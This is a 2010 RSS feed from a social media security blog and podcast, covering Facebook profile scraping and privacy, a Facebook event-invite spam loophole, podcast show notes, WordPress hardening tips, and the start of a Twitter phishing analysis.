<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Social Media Security</title>
	
	<link>http://socialmediasecurity.com</link>
	<description>Exposing the insecurities of social media</description>
	<lastBuildDate>Tue, 27 Jul 2010 19:29:22 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
	<!-- podcast_generator="podPress/8.8" - maintenance_release="8.8.4" -->
		<copyright>2009 </copyright>
		<managingEditor>feedback@socialmediasecurity.com (Social Media Security)</managingEditor>
		<webMaster>feedback@socialmediasecurity.com (Social Media Security)</webMaster>
		<category>Podcasts</category>
		<ttl>1440</ttl>
		<itunes:keywords>twitter,facebook,myspace,privacy,security,socialmedia,socialnetworking</itunes:keywords>
		<itunes:subtitle>Social Media Security Podcast</itunes:subtitle>
		<itunes:summary>A podcast about the security and insecurity of social media.  Hosts are Scott Wright from the Street-Wise Security Zone, Tom Eston founder of socialmediasecurity.com and Kevin Johnson SANS instructor and security consultant with InGuardians.</itunes:summary>
		<itunes:author>Social Media Security</itunes:author>
		
		
		<itunes:block>No</itunes:block>
		<itunes:explicit>no</itunes:explicit>
		<itunes:image href="http://socialmediasecurity.com/wp-content/uploads/2009/08/skull.jpg" />
		<image>
			<url>http://socialmediasecurity.com/wp-content/uploads/2009/08/skull.jpg</url>
			<title>Social Media Security</title>
			<link>http://socialmediasecurity.com</link>
			<width>144</width>
			<height>144</height>
		</image>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/SocialMediaSecurity" /><feedburner:info uri="socialmediasecurity" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><media:copyright>2009</media:copyright><media:thumbnail url="http://socialmediasecurity.com/wp-content/uploads/2009/08/skull.jpg" /><media:keywords>twitter,facebook,myspace,privacy,security,socialmedia,socialnetworking</media:keywords><media:category scheme="http://www.itunes.com/dtds/podcast-1.0.dtd">Technology/Tech News</media:category><itunes:owner><itunes:email>feedback@socialmediasecurity.com</itunes:email></itunes:owner><itunes:category text="Technology"><itunes:category text="Tech News" /></itunes:category><feedburner:emailServiceId>SocialMediaSecurity</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item>
		<title>Security Through Obscurity and Privacy in Practice</title>
		<link>http://feedproxy.google.com/~r/SocialMediaSecurity/~3/3aUgwkerT64/</link>
		<comments>http://feedproxy.google.com/~r/theharmonyguy/~3/jAVxCzrLPn8/#comments</comments>
		<pubDate>Tue, 27 Jul 2010 19:29:22 +0000</pubDate>
		<dc:creator>feedback@socialmediasecurity.com</dc:creator>
				<category><![CDATA[Contributors]]></category>
		<category><![CDATA[socnetsec]]></category>

		<guid isPermaLink="false">http://theharmonyguy.com/?p=835</guid>
		<description><![CDATA[Yesterday, security researcher Ron Bowes published a 2.8GB database of information collected from public Facebook pages. These pages list all users whose privacy settings enable a public search listing for their profile. Bowes wrote a program to scan through the listings and save the first name, last name, and profile URI of each user (though [...]]]></description>
			<content:encoded><![CDATA[<p>Yesterday, security researcher <a title="SkullSecurity" href="http://www.skullsecurity.org/blog/">Ron Bowes</a> published a 2.8GB database of information collected from public Facebook pages. These pages list all users whose privacy settings enable a public search listing for their profile. Bowes wrote a program to scan through the listings and save the first name, last name, and profile URI of each user (though only if their last name began with a Latin character). The database includes this data for about 171 million profiles.</p>
<p>On the one hand, I wasn&#8217;t entirely surprised by this news &#8211; it was only a matter of time before someone started building up such a dataset. I&#8217;ve previously mentioned that developer <a title="Pete Warden" href="http://petewarden.typepad.com/">Pete Warden</a> had planned on releasing public profile information for 210 million Facebook users until the company&#8217;s legal team stepped in. But nothing technical prevented someone else from attempting the task and posting data without notice. I imagine Facebook may not be too happy with Bowes&#8217; data, but I&#8217;m not going to delve into the legal issues surrounding page scraping.</p>
<p>However, the event did remind me of a related issue I&#8217;ve pondered over the last few months: the notion of &#8220;security through obscurity&#8221; as it relates to privacy issues.<span id="more-835"></span></p>
<p>I&#8217;ve often referenced the work of <a title="danah boyd" href="http://www.danah.org/">danah boyd</a>, a social media researcher that I highly respect. In a talk earlier this year at WWW2010 entitled, &#8221;<a title="&quot;Privacy and Publicity in the Context of Big Data&quot;" href="http://www.danah.org/papers/talks/2010/WWW2010.html">Privacy and Publicity in the Context of Big Data</a>,&#8221; she outlines several excellent considerations on handling massive collections of data about people. One in particular that&#8217;s worth remembering in the context of public Facebook information: &#8220;<em>Just because data is accessible doesn&#8217;t mean that using it is ethical.</em>&#8221; <a title="Michael Zimmer.org" href="http://michaelzimmer.org/">Michael Zimmer</a> at the University of Wisconsin-Milwaukee <a title="Michael Zimmer.org » Blog Archive » Why Pete Warden Should Not Release Profile Data on 215 Million Facebook Users" href="http://michaelzimmer.org/2010/02/12/why-pete-warden-should-not-release-profile-data-on-215-million-facebook-users/">has made similar arguments</a>, noting that mass harvesting of Facebook data goes against the expectations of users who maintain a public profile for discovery by friends, among other issues. Knowing some of the historical issues with academic research involving human subjects, I tend to agree with these positions.</p>
<p>But a related point from boyd&#8217;s talk concerns me from a security perspective: &#8220;Security Through Obscurity Is a Reasonable Strategy.&#8221; As an example, she notes that people talking in public settings may still discuss personal matters, but they rely on being one conversation among hundreds to maintain privacy. If people knew other people were specifically listening to their conversation, they would adjust the topic accordingly.</p>
<p>In this &#8220;offline&#8221; example, taking advantage of obscurity makes sense. But boyd applies the same idea online: &#8220;You may think that they shouldn&#8217;t rely on being obscure, but asking everyone to be paranoid about everyone else in the world is a very very very unhealthy thing&#8230;. You may be able to stare at everyone who walks by but you don&#8217;t.  And in doing so, you allow people to maintain obscurity. What makes the Internet so different?  Why is it OK to demand the social right to stare at everyone just because you can?&#8221;</p>
<p>I would respond that at least three aspects make the Internet different. First, you rarely have anyway of knowing if someone is &#8220;staring at you&#8221; online. Public content on Facebook gets transferred to search engines, application developers, and individual web surfers every day without any notification to the creators of that content. Proxies and anonymizers can spoof or remove information that might otherwise help identify the source of a request. And as computing power increases each day, tracking down publicly accessible resources becomes ever easier.</p>
<p>Second, the nature of online data means that recording, parsing, and redistributing it tends to be far simpler than in the offline world. If I want to record someone&#8217;s in-person conversations, it&#8217;s theoretically possible that I could acquire a small recording device, place it in a convenient location, save the audio from it, type up a transcript of the person&#8217;s words, then send it to another person to read. But if I want to record someone&#8217;s conversations on Twitter (as an example), I can have all them in a format understandable to various computer-based analysis tools in just a few clicks. In fact, I could setup an automated system which monitors the person&#8217;s Twitter account and updates me whenever certain words of interest appear. Add the fact that this is true of any public Twitter account, and the capabilities for online monitoring grow enormously.</p>
<p>Finally, while digital content is in some ways more ephemeral than other media, web data tends to persist well beyond a creator&#8217;s ability to control. Search engine caches, archival sites, and user redistribution all contribute to keeping content alive. If someone records a spoken conversation on a tape, the tape can be destroyed before copies are made. But if you (or a friend of yours) post a sentence or photo on a social networking site, you may never be able to erase it fully from the Internet. Several celebrities have learned this the hard way lately.</p>
<p>From a privacy perspective, I wholeheartedly agree with boyd that we can&#8217;t expect users to become paranoid sysadmins. The final point of my own <a title="The Social Hacking Guide to Understanding Facebook Privacy" href="http://theharmonyguy.com/2010/05/04/the-social-hacking-guide-to-understanding-facebook-privacy/">guide</a> to Facebook privacy admonished, &#8220;You Have to Live Your Life.&#8221; But from a security perspective, I know that there will always be people and automated systems which are &#8220;staring at you&#8221; on the Internet. I&#8217;ve seen time and again that if data is placed where others can access it online, someone will access it &#8211; perhaps even unintentionally (Google indexes many pages that were obviously not meant for public consumption).</p>
<p>In my opinion, the only way to offer any setup online which resembles the sort of &#8220;private in public&#8221; context boyd described requires some sort of a walled garden, such as limiting your Facebook profile to logged in users. That alone still doesn&#8217;t provide the same degree of privacy, since many fake profiles exist and applications may still have access to your data. But while &#8220;security through obscurity&#8221; (or perhaps more accurately, privacy through obscurity) may be a decent strategy in many &#8220;offline&#8221; social situations, it simply can&#8217;t be relied on to protect users and data online.</p>
<p>Facebook users are starting to discover this firsthand. I&#8217;ve seen several reactions to Bowes&#8217; release that characterize it as a security issue or privacy issue, and people have seemed quite surprised that building such a dataset was even possible. Yet it really shouldn&#8217;t come as a surprise to someone familiar with current technology and ways of accessing Facebook data. And it won&#8217;t be the last time we see someone make use of &#8220;public&#8221; data in surprising ways. Some of these uses may be unfortunate or unethical (see above), but we&#8217;ve often seen technology steam ahead in pursuit of fortune, and the web has many users with differing ideas on ethics. Reversing the effects of such actions may prove impossible, which is why I would argue we need to prevent them by not trusting obscurity for protection. And how do we balance this perspective to avoid unhealthy paranoia? I&#8217;m honestly not sure &#8211; but if content is publicly accessible online without any technical limitations, we can hardly consider it immune to publicizing.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/theharmonyguy?a=jAVxCzrLPn8:Jskivh3Cths:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/theharmonyguy?d=YwkR-u9nhCs" border="0"></img></a>
</div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/SocialMediaSecurity?a=3aUgwkerT64:Jskivh3Cths:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/SocialMediaSecurity?d=yIl2AUoC8zA" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/SocialMediaSecurity/~4/3aUgwkerT64" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://feedproxy.google.com/~r/theharmonyguy/~3/jAVxCzrLPn8/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://feedproxy.google.com/~r/theharmonyguy/~3/jAVxCzrLPn8/</feedburner:origLink></item>
		<item>
		<title>Spam via Facebook Events Highlights Ongoing Challenges</title>
		<link>http://feedproxy.google.com/~r/SocialMediaSecurity/~3/6BjYNVPK-FU/</link>
		<comments>http://feedproxy.google.com/~r/theharmonyguy/~3/gL37DuwAsOI/#comments</comments>
		<pubDate>Mon, 26 Jul 2010 16:37:10 +0000</pubDate>
		<dc:creator>feedback@socialmediasecurity.com</dc:creator>
				<category><![CDATA[Contributors]]></category>
		<category><![CDATA[socnetsec]]></category>

		<guid isPermaLink="false">http://theharmonyguy.com/?p=963</guid>
		<description><![CDATA[Earlier today, I received an invitation to a Facebook event from &#8220;Giovanna&#8221; &#8211; someone I&#8217;d never heard of and certainly never added as a friend. The invite came as a bit of a surprise, since my profile was fairly locked down. While anyone could search for it, all profile information was set to &#8220;Friends Only,&#8221; [...]]]></description>
			<content:encoded><![CDATA[<p>Earlier today, I received an invitation to a Facebook event from &#8220;Giovanna&#8221; &#8211; someone I&#8217;d never heard of and certainly never added as a friend. The invite came as a bit of a surprise, since my profile was fairly locked down. While anyone could search for it, all profile information was set to &#8220;Friends Only,&#8221; and sending messages or making friend requests was limited to &#8220;Friends of Friends.&#8221; None of my friends seem to know Giovanna, and her profile is probably fake anyway.</p>
<p>The event title proclaimed &#8220;iPhone Testers Needed!&#8221; and might be enticing to users who want an iPhone. While the event page included more information on the supposed testing program, the invite was followed by a message from the event creator. Once you&#8217;re on the guest list for a Facebook event, the event administrators can send out Facebook messages you&#8217;ll receive, regardless of privacy settings. This particular message (which also arrived in my e-mail inbox due to notifications settings) included a link to the iPhone opportunity, which unsurprisingly was a typical &#8220;offer&#8221; page that required me to submit personal information and try out some service before I could get my fancy new phone.<span id="more-963"></span></p>
<p>I began investigating how this all happened. When you create a Facebook event and try to invite people, you&#8217;ll only see a list of your friends to choose from. But it turns out that on the backend, nothing prevents you from submitting requests directly to Facebook with other people&#8217;s Facebook IDs. In my testing, I&#8217;ve been able to send event invitations to other users even if we&#8217;re not friends and they have tight privacy settings. I&#8217;m guessing that using this technique to invite more than a few people could raise a spam alert, but I&#8217;m not sure. Also, an event invitation does not give the event creator increased access to any profile information of guests, but as already noted, it does let event administrators send messages to people they might otherwise not be able to contact.</p>
<p>I&#8217;m sure Facebook will take action soon to clamp down on this particular loophole, so I think it unlikely we&#8217;ll see it exploited too widely. (The iPhone testing event currently has around 1800 guests &#8211; significant, but tiny compared to other Facebook scams.) But it does demonstrate the sort of challenges Facebook is having to handle as their network and power expand. Several years ago, when the site was used for little besides keeping in touch with college classmates and other offline friends, Facebook was seen as mostly spam-free, in contrast to services like Myspace. Now that applications, social gaming friends, and corporate brands have all become integral parts of the Facebook experience, black hat marketers keep finding new ways to spread links among users. And worse, those tricks can often be used to spread malware as well.</p>
<p>I do think that Facebook wants to avoid annoying users with spam, and works to prevent your inbox on the site from becoming as flooded as a typical e-mail account. But a network of 500 million people presents a very enticing target, and we&#8217;ll keep seeing new scam ideas pop up as Facebook expands and adds features. In the mean time, continue to be wary of any links  promising a glamorous reward for free.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/theharmonyguy?a=gL37DuwAsOI:1HPrt12aoG4:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/theharmonyguy?d=YwkR-u9nhCs" border="0"></img></a>
</div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/SocialMediaSecurity?a=6BjYNVPK-FU:1HPrt12aoG4:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/SocialMediaSecurity?d=yIl2AUoC8zA" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/SocialMediaSecurity/~4/6BjYNVPK-FU" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://feedproxy.google.com/~r/theharmonyguy/~3/gL37DuwAsOI/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://feedproxy.google.com/~r/theharmonyguy/~3/gL37DuwAsOI/</feedburner:origLink></item>
		<item>
		<title>Social Media Security Podcast 16 – Diaspora News, FTC and Twitter, Twitter XSS, Facebook App Permissions</title>
		<link>http://feedproxy.google.com/~r/SocialMediaSecurity/~3/21DaL2gsxq8/</link>
		<comments>http://socialmediasecurity.com/2010/07/05/social-media-security-podcast-16-diaspora-news-ftc-and-twitter-twitter-xss-facebook-app-permissions/#comments</comments>
		<pubDate>Mon, 05 Jul 2010 16:44:11 +0000</pubDate>
		<dc:creator>feedback@socialmediasecurity.com</dc:creator>
				<category><![CDATA[Podcasts]]></category>
		<category><![CDATA[diaspora]]></category>
		<category><![CDATA[EFF]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[FTC]]></category>
		<category><![CDATA[NTIA]]></category>
		<category><![CDATA[OSTWG]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[Privacy]]></category>
		<category><![CDATA[socnetsec]]></category>
		<category><![CDATA[Twitter]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://socialmediasecurity.com/?p=2434</guid>
		<description><![CDATA[This is the 16th episode of the Social Media Security Podcast recorded July 2, 2010.  This episode was hosted by Tom Eston and Scott Wright.  Below are the show notes, links to articles and news mentioned in the podcast: Quick update on Diaspora (pronounced Di-as-para).  Here is a video update as well. FTC nails Twitter [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignright size-full wp-image-2319" title="skull" src="http://socialmediasecurity.com/wp-content/uploads/2010/05/skull.jpg" alt="" width="104" height="102" />This is the 16th episode of the Social Media Security Podcast recorded July 2, 2010.  This episode was hosted by <a href="http://twitter.com/agent0x0">Tom Eston</a> and <a href="http://twitter.com/streetsec">Scott Wright</a>.  Below are the       show notes, links to articles and news mentioned in the podcast:</p>
<ul>
<li><a href="http://www.joindiaspora.com/2010/07/01/one-month-in.html">Quick update</a> on Diaspora (pronounced Di-as-para).  Here is a <a href="http://vimeo.com/13026281">video update</a> as well.</li>
<li><a href="http://lastwatchdog.com/ftc-nails-twitter-deceiving-users-privacy-security/">FTC  nails Twitter</a> for deceiving users about privacy and security</li>
<li><a href="https://www.eff.org/https-everywhere">HTTPS Everywhere Firefox extension</a> from the EFF</li>
<li><a href="http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/">Persistent  XSS on Twitter.com</a></li>
<li><a href="http://www.spylogic.net/2010/06/interesting-new-twitter-phish-can-lead-to-bad-places/">Interesting  New Twitter Phish Can Lead to Bad Places</a></li>
<li><a href="http://techcrunch.com/2010/06/30/facebook-permissions-applications/">Facebook  Rolls Out Simplified Application Permissions System</a></li>
<li>Facebook  Phonebook Is <a href="http://www.allfacebook.com/2010/06/facebook-phonebook-security/">Not A Security Threat</a></li>
<li>NTIA  (National Telecommunications and Information Administration) has  received the report of the Online Safety and Technology Working Group  (OSTWG) <a href="http://www.ntia.doc.gov/reports/2010/OSTWG_Final_Report_060410.pdf">&#8220;Youth Safety on a Living Internet&#8221; (2.42 MB PDF file)</a></li>
</ul>
<p>Please send any show feedback to <strong>feedback [aT]       socialmediasecurity.com</strong> or comment below.  You can also call       our voice mail box at <strong>1-613-693-0997</strong> if you have a       question for our Q&amp;A section on the next episode.  <strong>You  can      also <a href="http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=329032812">subscribe       to the podcast in iTunes</a>. </strong>Thanks for listening!</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/SocialMediaSecurity?a=21DaL2gsxq8:C1Oovq5kS9Y:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/SocialMediaSecurity?d=yIl2AUoC8zA" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/SocialMediaSecurity/~4/21DaL2gsxq8" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://socialmediasecurity.com/2010/07/05/social-media-security-podcast-16-diaspora-news-ftc-and-twitter-twitter-xss-facebook-app-permissions/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		<enclosure url="http://socialmediasecurity.com/podpress_trac/feed/2434/0/SocialMediaSecurityPodcast_16.mp3" length="16435082" type="audio/mpeg" />
<itunes:duration>34:09</itunes:duration>
		<itunes:subtitle>This is the 16th episode of the Social Media Security Podcast recorded July 2, 2010.nbsp; This episode was hosted by Tom Eston and Scott Wright.nbsp; ...</itunes:subtitle>
		<itunes:summary>This is the 16th episode of the Social Media Security Podcast recorded July 2, 2010.nbsp; This episode was hosted by Tom Eston and Scott Wright.nbsp; Below are the       show notes, links to articles and news mentioned in the podcast:

	Quick update on Diaspora (pronounced Di-as-para).nbsp; Here is a video update as well.
	FTC  nails Twitter for deceiving users about privacy and security
	HTTPS Everywhere Firefox extension from the EFF
	Persistent  XSS on Twitter.com
	Interesting  New Twitter Phish Can Lead to Bad Places
	Facebook  Rolls Out Simplified Application Permissions System
	Facebook  Phonebook Is Not A Security Threat
	NTIA  (National Telecommunications and Information Administration) has  received the report of the Online Safety and Technology Working Group  (OSTWG) "Youth Safety on a Living Internet" (2.42 MB PDF file)

Please send any show feedback to feedback [aT]       socialmediasecurity.com or comment below.nbsp; You can also call       our voice mail box at 1-613-693-0997 if you have a       question for our Q#38;A section on the next episode.nbsp; You  can      also subscribe       to the podcast in iTunes. Thanks for listening!</itunes:summary>
		<itunes:keywords>socialmedia,facebook,twitter,diaspora,ftc,xss,ntia</itunes:keywords>
		<itunes:author>Social Media Security</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>No</itunes:block>
	<media:content url="http://socialmediasecurity.com/podpress_trac/feed/2434/0/SocialMediaSecurityPodcast_16.mp3" fileSize="16435082" type="audio/mpeg" /><feedburner:origLink>http://socialmediasecurity.com/2010/07/05/social-media-security-podcast-16-diaspora-news-ftc-and-twitter-twitter-xss-facebook-app-permissions/</feedburner:origLink></item>
		<item>
		<title>Secure Your WordPress By Learning From My Mistakes</title>
		<link>http://feedproxy.google.com/~r/SocialMediaSecurity/~3/xf1QaGerPg4/</link>
		<comments>http://feedproxy.google.com/~r/theharmonyguy/~3/cu-wxgYWaMM/#comments</comments>
		<pubDate>Fri, 25 Jun 2010 23:07:26 +0000</pubDate>
		<dc:creator>feedback@socialmediasecurity.com</dc:creator>
				<category><![CDATA[Contributors]]></category>
		<category><![CDATA[socnetsec]]></category>

		<guid isPermaLink="false">http://theharmonyguy.com/?p=938</guid>
		<description><![CDATA[Several weeks ago, I managed to create a small ruckus on Twitter by issuing a warning about a possible WordPress vulnerability. I was rather embarrassed to eventually discover that the actual problem related to a backdoor still on my server from a previous hack. This was not my first lesson in WordPress security, but it [...]]]></description>
			<content:encoded><![CDATA[<p>Several weeks ago, I managed to create a small ruckus on Twitter by issuing a warning about a possible WordPress vulnerability. I was rather embarrassed to eventually discover that the actual problem related to a backdoor still on my server from a previous hack. This was not my first lesson in WordPress security, but it was certainly a memorable one.</p>
<p>I first created this blog in 2007 after finding basic CSRF issues in the first publicly available OpenSocial application. At the time, I admittedly knew very little about application security (not that I know much now!), but I was interested in many aspects of building online social networking systems, and that led me to research security issues more and more. Over time, this blog grew and several other projects hosted on the same server fell by the wayside. As my understanding of security also grew, I found some of my sites hacked a few times, and I undertook a number of steps to secure this WordPress installation.</p>
<p><span id="more-938"></span>That maintenance contributed to the confidence I had in my warning on Twitter &#8211; malicious scripts kept popping up in my site&#8217;s footer, and the only apparent problem were some suspicious requests to a particular WordPress interface. I had looked gone through all my plug-ins (the apparent source of previous attacks), double-checked my permissions, changed passwords, etc. I finally did a thorough sweep of every single folder on my site, and lurking in an upload folder, I found a sophisticated PHP backdoor.</p>
<p>I&#8217;m guessing that file originally been placed during a much older attack and I&#8217;d simply missed it until now. Since deleting it and taking even more steps to protect my blog, I&#8217;ve not had any more trouble. I wouldn&#8217;t presume to think this site is 100% secure and I&#8217;ve never claimed to be an expert on application security, much less WordPress or PHP security, but I&#8217;m now quite confident that I&#8217;ve taken enough precautions to avoid most attacks.</p>
<p>That leads me to the following list of steps I&#8217;ve performed to harden this particular WordPress site. If you&#8217;ve not taken the time to ensure your blog is secure, this may be a good guide for you to start with. I&#8217;m indebted to many websites on WordPress security, and while I would want to link to all of them, I&#8217;m honestly not sure of all the specific ones I&#8217;ve drawn from and it would take a while to piece them together. A <a title="wordpress hardening - Google Search" href="http://www.google.com/search?q=wordpress+hardening">quick search</a> will bring up many helpful recommendations, and I encourage you to check them out in addition to these tips.</p>
<ul>
<li><strong>Stay updated.</strong> Running the most current version of WordPress is probably the most important step. My host offers automatic updating for my installations. Also, be sure to keep your plug-ins updated as well.</li>
<li><strong>Protect other sites.</strong> If you have more than one website running on the same server, make sure all of them are secure. One vulnerable application can compromise others. If you have sites that you don&#8217;t maintain, consider deleting them or locking them down to avoid future problems.</li>
<li><strong>Scan through all of your folders.</strong> If you haven&#8217;t done this in a while, now would be a good time. Look through what files are present and keep an eye out for anything suspicious. Check your WordPress files against a fresh download to make sure they line up.</li>
<li><strong>Scan through all of your permissions.</strong> This should be fairly easy with an FTP program that displays permissions settings. With rare exception, I keep files at chmod 644 and folders at chmod 755.</li>
<li><strong>Periodically change passwords.</strong> Definitely modify your passwords if you&#8217;ve recovered from an attack. Remember to change your database password (and corresponding line in wp-config.php) as well as account passwords.</li>
<li><strong>Use modified passphrases.</strong> This is one tip I don&#8217;t see often, but it&#8217;s one of my favorite tricks. Rather than simply jumbling characters into a password you have trouble remembering, start with a sentence. Not something terribly common, but something familiar to you. Pick one with at least six words in it. Take the whole sentence, with capitalization and punctuation, and add some complexity &#8211; append some numbers and punctuation at the beginning or end, and maybe change a few letters to numbers (such as &#8220;3&#8243; for &#8220;e&#8221;). You should then have a very strong &#8220;password&#8221; that&#8217;s much easier to remember. Many websites and applications will let you use spaces and hundreds of characters in your password. But once again: avoid common phrases, include at least six words, and don&#8217;t just use a sentence without adding some numbers and special characters.</li>
<li><strong>Check your users table in the database.</strong> I&#8217;ve seen attacks before that lead to the creation of an administrative account which is then hidden from the list of users in the web-based control panel. I&#8217;ve never quite understood why hidden users should be allowed, but that could be part of the attack to begin with. Anyway, just to be careful, I like to look at the actual table in the database and see if any other accounts have administrative privileges.</li>
<li><strong>Double-check and clean up all plug-ins.</strong> I&#8217;ve deleted every plug-in I don&#8217;t use, and I try to keep all of my active plug-ins current. If you have a plug-in that&#8217;s no longer maintained or hasn&#8217;t been updated in a long time, you should probably check and see if a newer replacement is available. In my experience, plug-ins can be one of the weakest points in your WordPress installation. It&#8217;s kind of like a certain other site I know well &#8211; Facebook itself tends to be pretty secure, but you can often access data through vulnerable Facebook applications.</li>
<li><strong>Add HTTP authentication to your wp-admin folder.</strong> This is covered in many places online so I&#8217;ll not recap specific steps here. And I&#8217;ll add that I realize this is not a silver bullet &#8211; basic authentication sends passwords in cleartext (so don&#8217;t use the same credentials as your WordPress account), and the traffic is not encrypted if you&#8217;re not using SSL/TLS. But adding another login prompt for the admin panel adds friction and may repel less-determined attackers. (This tip is obviously geared towards those who don&#8217;t have user accounts for non-admins.)</li>
<li><strong>Move wp-config.php to a folder not as easily accessible.</strong> You can place wp-config.php one folder above your WordPress install; under my hosting setup, this location does not correspond to any public website folder. I also set mine to chmod 644 after changing it.</li>
<li><strong>Rename your admin account.</strong> Several means exist to do this; I simply edited the record in the database.</li>
<li><strong>Change your table prefix.</strong> This can be a bit of a hassle, but plug-ins exist (see below) to help. I&#8217;ll admit that I still need to check this one off my own list; long story.</li>
<li><strong>Disable interfaces such as XML-RPC if you don&#8217;t use them.</strong> I don&#8217;t doubt that the programmers behind WordPress have worked hard to secure these interfaces, but I simply don&#8217;t like having another avenue of accessing administrative functions. And I think it&#8217;s not a bad idea to disable features you don&#8217;t actually need.</li>
<li><strong>Use security tools.</strong> I installed the <a title="WordPress &amp;#8250; WP Security Scan &amp;laquo; WordPress Plugins" href="http://wordpress.org/extend/plugins/wp-security-scan/">WP Security Scan</a> plug-in after reading about it on WordPress&#8217; own <a title="Hardening WordPress &amp;laquo; WordPress Codex" href="http://codex.wordpress.org/Hardening_WordPress">hardening guide</a>.</li>
<li><strong>Keep monitoring your site.</strong> I make a habit of loading up my homepage ever so often, hitting &#8220;View Source,&#8221; and scanning through the HTML. If I ever see an unfamiliar script or iframe element, I look closer.</li>
</ul>
<p>That&#8217;s my personal list of WordPress security tips, based on many helpful resources and my own experiences of getting hacked. These certainly don&#8217;t apply to everyone, more could be added, and your mileage may vary, but hopefully this will help others avoid some of the problems I encountered. Be sure to look at other people&#8217;s advice as well and watch out for any WordPress security news.</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/theharmonyguy?a=cu-wxgYWaMM:m_4q-AnEHWs:YwkR-u9nhCs"><img src="http://feeds.feedburner.com/~ff/theharmonyguy?d=YwkR-u9nhCs" border="0"></img></a>
</div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/SocialMediaSecurity?a=xf1QaGerPg4:m_4q-AnEHWs:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/SocialMediaSecurity?d=yIl2AUoC8zA" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/SocialMediaSecurity/~4/xf1QaGerPg4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://feedproxy.google.com/~r/theharmonyguy/~3/cu-wxgYWaMM/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://feedproxy.google.com/~r/theharmonyguy/~3/cu-wxgYWaMM/</feedburner:origLink></item>
		<item>
		<title>Interesting New Twitter Phish Can Lead to Bad Places</title>
		<link>http://feedproxy.google.com/~r/SocialMediaSecurity/~3/itpXZ6LOHO8/</link>
		<comments>http://feedproxy.google.com/~r/spylogic/~3/RhpSFsGWKAg/#comments</comments>
		<pubDate>Thu, 24 Jun 2010 12:00:30 +0000</pubDate>
		<dc:creator>feedback@socialmediasecurity.com</dc:creator>
				<category><![CDATA[Contributors]]></category>
		<category><![CDATA[Social Networking]]></category>
		<category><![CDATA[Twitter]]></category>
		<category><![CDATA[email]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[socnetsec]]></category>

		<guid isPermaLink="false">http://www.spylogic.net/?p=468</guid>
		<description><![CDATA[I&#8217;ve had several fake emails that initially look like they come from Twitter in my email recently.  I didn&#8217;t think anything of it until several of my friends forwarded me the same type of emails.  This suggests two things.  One, that these emails are starting to hit a larger audience.  Or two, they are targeting [...]]]></description>
			<content:encoded><![CDATA[<p>I’ve had several fake emails that initially look like they come from Twitter in my email recently.  I didn’t think anything of it until several of my friends forwarded me the same type of emails.  This suggests two things.  One, that these emails are starting to hit a larger audience.  Or two, they are targeting just my friends and I which is totally possible. <img class="wp-smiley" src="http://www.spylogic.net/wp-includes/images/smilies/icon_smile.gif" alt=":-)" /> Anyway, here is a quick bit of analysis of one of these emails.  I found some interesting things when I investigated the website linked in the fake email.  The link in this particular could have done more damage if it wasn’t for some crappy attacker code.  Read on!</p>
<p><strong>The Email</strong><br />
The following screen shot shows you what the email looks like.  It seems to come from Twitter but you will notice that there are some interesting clues that tell you this isn’t real.  First, the Twitter account mentioned is just the first part of the email address this was sent to.  This may or may not be your Twitter ID.  Second, check out the “Britney Spears home video feedback” subject line and “Antidepressants for your bed vigor” bold red in the message body.  Yep.  All the signs that this isn’t from Twitter.  Ok, nothing to see here right?</p>
